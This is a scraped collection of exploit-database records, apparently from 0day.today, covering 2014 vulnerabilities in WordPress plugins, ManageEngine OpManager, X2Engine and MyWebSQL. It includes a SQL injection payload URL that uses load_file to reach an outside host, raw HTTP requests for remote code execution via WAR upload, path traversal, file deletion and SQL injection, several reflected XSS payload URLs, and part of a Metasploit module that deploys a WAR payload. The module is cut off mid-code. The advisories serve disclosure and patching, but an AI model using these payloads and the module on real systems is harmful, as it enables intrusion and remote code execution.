src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpdate to All In One WP Security 3.8.3\n\nMore Information:\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-14T14:37:35", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29642", "href": "https://0day.today/exploit/description/29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/29642", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-09T13:20:31", "description": "X2Engine versions 2.8 through 4.1.7 suffer from a PHP object injection and below suffer from an unrestricted file upload vulnerability due to poor use of a blacklist.", "cvss3": {}, "published": "2014-09-23T00:00:00", "type": "zdt", "title": "X2Engine 4.1.7 PHP Object Injection / Unrestricted File Upload Vulnerabilies", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5297", "CVE-2014-5298"], "modified": "2014-09-23T00:00:00", "id": "1337DAY-ID-22679", "href": "https://0day.today/exploit/description/22679", "sourceData": "-------------------------------------------------------------------------\r\nX2Engine <= 4.1.7 (SiteController.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.x2engine.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nAll versions from 2.8 to 4.1.7.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the \"actionSendErrorReport\" method defined in /protected/controllers/SiteController.php:\r\n\r\n153. public function actionSendErrorReport(){\r\n154. if(isset($_POST['report'])){\r\n155. $errorReport = $_POST['report'];\r\n156. $errorReport = unserialize(base64_decode($errorReport));\r\n157. if(isset($_POST['email'])){\r\n158. $errorReport['email'] = $_POST['email'];\r\n159. }\r\n\r\nUser input passed through the \"report\" POST parameter is not properly sanitized before being used in a call to the \"unserialize()\"\r\nfunction at line 156. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow an\r\nattacker to carry out Server-Side Request Forgery (SSRF) and possibly other attacks via specially crafted serialized objects.\r\n\r\n\r\n[-] Solution:\r\n\r\nApply the vendor patch or update to version 4.2 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/07/2014] - Vendor notified\r\n[31/07/2014] - Vendor released security patch: http://x2community.com/?showtopic=1804\r\n[01/08/2014] - CVE number requested\r\n[16/08/2014] - CVE number assigned\r\n[05/09/2014] - Version 4.2 released\r\n[23/09/2014] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2014-5297 to this vulnerability.\r\n\r\n\r\n\r\n--------------------------------------------------------------------------------\r\nX2Engine <= 4.1.7 (FileUploadsFilter.php) Unrestricted File Upload Vulnerability\r\n--------------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.x2engine.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 4.1.7 and probably prior versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerability exists because of the FileUploadsFilter::EXT_BLACKLIST constant, which is a regular\r\nexpression for blacklisted files. Due to a lack of case-insensitive matching, the global upload filter\r\ncould be bypassed by uploading a malicious file with capital letters within the extension. This can be\r\nexploited to upload and execute arbitrary PHP scripts if X2Engine is running on a case-insensitive\r\nfilesystem or if the web server is configured to handle files\u2019 extensions in a case-insensitive fashion.\r\n\r\n\r\n[-] Solution:\r\n\r\nUpdate to version 4.2 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[01/08/2014] - Vendor notified\r\n[02/08/2014] - CVE number requested\r\n[16/08/2014] - CVE number assigned\r\n[05/09/2014] - Version 4.2 released\r\n[23/09/2014] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2014-5298 to this vulnerability.\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/22679", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:47", "description": "WordPress Google Calendar Events plugin version 2.0.1 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "zdt", "title": "WordPress Google Calendar Events 2.0.1 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7138"], "modified": "2014-10-10T00:00:00", "id": "1337DAY-ID-22744", "href": "https://0day.today/exploit/description/22744", "sourceData": "Product: Google Calendar Events WordPress plugin\r\nVendor: Phil Derksen\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: October 7, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7138\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138\r\n\r\nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Google Calendar Events 2.0.4\r\n\r\nMore Information:\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/22744", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-09T21:13:34", "description": "WordPress Contact Form DB plugin version 2.8.13 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "zdt", "title": "WordPress Contact Form DB 2.8.13 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7139"], "modified": "2014-10-10T00:00:00", "id": "1337DAY-ID-22743", "href": "https://0day.today/exploit/description/22743", "sourceData": "Product: Contact Form DB WordPress plugin\r\nVendor: Michael Simpson\r\nVulnerable Version(s): 2.8.13 and probably prior\r\nTested Version: 2.8.13\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 25, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7139\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed.\r\n\r\n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139\r\n\r\n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Contact Form DB 2.8.16.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/22743", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-01T01:06:51", "description": "WordPress Photo Gallery plugin version 1.1.30 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-10-02T00:00:00", "type": "zdt", "title": "WordPress Photo Gallery 1.1.30 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6315"], "modified": "2014-10-02T00:00:00", "id": "1337DAY-ID-22718", "href": "https://0day.today/exploit/description/22718", "sourceData": "Product: Photo Gallery WordPress plugin\r\nVendor: http://web-dorado.com/\r\nVulnerable Version(s): 1.1.30 and probably prior\r\nTested Version: 1.1.30\r\nAdvisory Publication: September 10, 2014 [without technical details]\r\nVendor Notification: September 10, 2014 \r\nVendor Patch: September 10, 2014 \r\nPublic Disclosure: October 1, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6315\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315\r\n\r\n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Photo Gallery 1.1.31\n\n# 0day.today [2017-12-31] #", "sourceHref": "https://0day.today/exploit/22718", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-19T07:13:00", "description": "MyWebSQL version 3.4 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-09-04T00:00:00", "type": "zdt", "title": "MyWebSQL 3.4 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-4735"], "modified": "2014-09-04T00:00:00", "id": "1337DAY-ID-22590", "href": "https://0day.today/exploit/description/22590", "sourceData": "Product: MyWebSQL\r\nVendor: http://mywebsql.net/\r\nVulnerable Version(s): 3.4 and probably prior\r\nTested Version: 3.4\r\nAdvisory Publication: June 25, 2014 [without technical details]\r\nVendor Notification: June 25, 2014 \r\nPublic Disclosure: September 3, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-4735\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735\r\n\r\nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it.\r\n\r\nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-06-25 Vendor alerted via emails and contact form.\r\n2014-07-03 Vendor alerted via emails, contact form and twitter.\r\n2014-07-03 Vendor replied that he received information.\r\n2014-07-10 Fix requested.\r\n2014-07-10 Vendor requested to move public disclosure date to August 30.\r\n2014-08-27 Fix requested.\r\n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch.\r\n2014-08-27 Disclosure date moved to September 3.\r\n2014-09-01 Fix requested.\r\n2014-09-03 Public disclosure, patch by HTB Research is available.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22590", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-02T19:34:58", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6034"], "modified": "2014-10-01T00:00:00", "id": "1337DAY-ID-22712", "href": "https://0day.today/exploit/description/22712", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\nRank = ExcellentRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Exploit::FileDropper\r\n\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n'Description' => %q{\r\nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\nversion 11.0 of SocialIT for Windows and Linux.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6034' ],\r\n[ 'OSVDB', '112276' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt'\r\n],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n],\r\n'Privileged' => true,\r\n'Platform' => 'java',\r\n'Arch' => ARCH_JAVA,\r\n'Targets' =>\r\n[\r\n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n],\r\n'DefaultTarget' => 0,\r\n'DisclosureDate' => 'Sep 27 2014'))\r\n\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptInt.new('SLEEP',\r\n[true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n], self.class)\r\nend\r\n\r\ndef check\r\nres = send_request_cgi({\r\n'uri' =>\r\nnormalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n'method' => 'GET'\r\n})\r\n\r\n# A GET request on this servlet returns \"405 Method not allowed\"\r\nif res and res.code == 405\r\nreturn Exploit::CheckCode::Detected\r\nend\r\n\r\nreturn Exploit::CheckCode::Safe\r\nend\r\n\r\n\r\ndef upload_war_and_exec(try_again, app_base)\r\ntomcat_path = '../../../tomcat/'\r\nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\nif try_again\r\n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\r\n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML\r\ncomments.\r\n# After replacing the context.xml file let's upload the WAR again.\r\nprint_status(\"#{peer} - Replacing Tomcat context file\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context\r\nprivileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"conf\",\r\n'FILENAME' => \"context.xml\"\r\n}\r\n})\r\nelse\r\n# We need to create the upload directories before our first attempt to upload the WAR.\r\nprint_status(\"#{peer} - Creating upload directories\")\r\nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => \"\",\r\n'FILENAME' => bogus_file\r\n}\r\n})\r\nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\nend\r\n\r\nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\nprint_status(\"#{peer} - Uploading WAR file...\")\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => war_payload,\r\n'ctype' => 'application/octet-stream',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"webapps\",\r\n'FILENAME' => app_base + \".war\"\r\n}\r\n})\r\n\r\n# The server either returns a 500 error or a 200 OK 